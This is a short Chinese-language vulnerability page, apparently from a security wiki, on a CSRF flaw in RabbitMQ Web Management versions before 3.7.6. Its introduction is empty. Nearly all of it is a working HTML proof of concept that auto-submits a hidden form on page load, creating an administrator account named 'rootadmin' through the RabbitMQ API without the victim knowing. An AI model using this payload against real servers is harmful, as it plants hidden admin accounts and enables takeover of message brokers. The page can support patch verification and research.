跳转至

RabbitMQ Web管理csrf漏洞

一、漏洞简介

二、漏洞影响

RabbitMQ Web Management \< 3.7.6

三、复现过程

&lt;html&gt; 
&lt;h2&gt;Add RabbitMQ Admin&lt;/h2&gt;
&lt;body&gt;
&lt;form name="rabbit" id="rabbit" action="https://www.0-sec.org/api/users/rootadmin" method="POST"&gt;
&lt;input type="hidden" name="username" value="rootadmin" /&gt;
&lt;input type="hidden" name="password" value="rootadmin" /&gt;
&lt;input type="hidden" name="tags" value="administrator" /&gt;
&lt;input type="submit"  value="save" /&gt;
&lt;/form&gt;
&lt;script&gt;
  window.onload = rabbit.submit()
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;